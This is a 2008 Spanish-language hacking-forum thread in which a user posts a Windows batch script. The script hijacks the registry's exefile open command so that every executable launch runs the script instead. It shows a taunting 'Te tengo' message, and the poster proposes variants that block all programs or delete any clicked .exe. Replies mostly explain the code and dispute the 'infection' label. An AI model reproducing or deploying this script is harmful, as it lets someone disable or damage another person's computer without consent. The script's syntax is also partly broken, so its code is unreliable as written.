elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Posible Infeccion de EXE...
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Posible Infeccion de EXE...  (Leído 3,722 veces)
SmartGenius

Desconectado Desconectado

Mensajes: 181


:P


Ver Perfil WWW
Posible Infeccion de EXE...
« en: 5 Mayo 2008, 03:21 am »

miren... yo el code que tengo es mas o menos el siguiente

Código:
  @echo off
title Infeccion de Ejecutables

if exist "%windir%\system32\exer.bat" (goto yes) else (goto main)

:main
copy %0
reg add HKCR\exefile\shell\open\command /ve /t REG_SZ /d exer.bat %%1 %%* /f
exit

:yes
msg /w * Te tengo ;)
call %1 (opcional)
exit

aunque tambien se puede poner solo un nombre de archivo... que muestre un mensaje de error y se salga... asi le provocara que se salga de sus cabales  :P :P, yo mismo me infecte y casi que me tiro d euna ventana  ;D

el codigo es asi como lo postee, el objetivo mio es que cuando el usuario intente abrir un programa le salga un mensaje ( al azar, o predefinido "powered by...") y que se salga
esto podria ser usado con varios fines, que le muestre el error y se salga, o que le muestre otro mensaje y posteriormente abra el programa, o que borre cualquier exe que sea clicado  >:D >:D

solo es una idea, si esta mal... por favor me corrigen

Saludos.


En línea


MK-Ultra


Desconectado Desconectado

Mensajes: 435


~ Nevermind ~


Ver Perfil WWW
Re: Posible Infeccion de EXE...
« Respuesta #1 en: 5 Mayo 2008, 20:22 pm »

Perdona mi ignorancia, pero aver si entendí el code:

Código:
@echo off
title Infeccion de Ejecutables

if exist "%windir%\system32\exer.bat" (goto yes) else (goto main)
Hasta aca todo bien
Código:
:main
copy %0
reg add HKCR\exefile\shell\open\command /ve /t REG_SZ /d exer.bat %%1 %%* /f
exit
Esto lo que hace es copiar el bat (exer.bat) en la carpeta system32 (copy %0) y la linea del registro sirve para que cada vez que se ejecute un programa se ejecute previamente el bat?
Código:
:yes
msg /w * Te tengo ;)
call %1 (opcional)
exit

Bueno, esto saca un mensaje que dice te tengo y posteriormente habre el bat de vuelta, nada nuevo :)


En línea

Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ
Chino Moreno

Desconectado Desconectado

Mensajes: 93


White Pony [ ! ]


Ver Perfil
Re: Posible Infeccion de EXE...
« Respuesta #2 en: 5 Mayo 2008, 20:36 pm »

Deberias cambiar el titulo, esto no tiene nada que ver con infectar un ejecutable.
En línea



¿Necesitas información sobre una función que comenté? Lo mas seguro es que la encuentres en MSDN
SmartGenius

Desconectado Desconectado

Mensajes: 181


:P


Ver Perfil WWW
Re: Posible Infeccion de EXE...
« Respuesta #3 en: 6 Mayo 2008, 02:59 am »

Bueno, esto saca un mensaje que dice te tengo y posteriormente habre el bat de vuelta, nada nuevo :)

Pues si lo entendiste, pero no llama nuevamente al bat, sino que llama al ejecutable...

osea, este se agrega al registro, y cuando intenten abrir un programa se abrira es nnuestro code, entonces sale el mensaje, y la opcinal es que despues abar el programa al que se quiso llamar, osea el que se pasa al code con el parametro %1, si no ponemos esto, entonces simplemente no deja abrir ningun ejecutable...

Entiendes ??

Saludos.
En línea


MK-Ultra


Desconectado Desconectado

Mensajes: 435


~ Nevermind ~


Ver Perfil WWW
Re: Posible Infeccion de EXE...
« Respuesta #4 en: 6 Mayo 2008, 03:17 am »

Roger that  ;D
En línea

Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ
NoryNR

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Re: Posible Infeccion de EXE...
« Respuesta #5 en: 7 Junio 2008, 19:06 pm »

Deberias cambiar el titulo, esto no tiene nada que ver con infectar un ejecutable.

estoy con el :P
En línea

SmartGenius

Desconectado Desconectado

Mensajes: 181


:P


Ver Perfil WWW
Re: Posible Infeccion de EXE...
« Respuesta #6 en: 11 Junio 2008, 04:49 am »

Pues i se habran dado cuenta dice"Posible"... no que realmente lo sea, pero se encarga de deshabilitar ejecutables, como si estuviesen infectado...

mas o menos esa era la idea.

Saludos.
En línea


Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Duda con posible infección meterpreter en Windows10
Seguridad
xavi_goma 8 4,096 Último mensaje 13 Febrero 2018, 03:13 am
por AXCESS
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines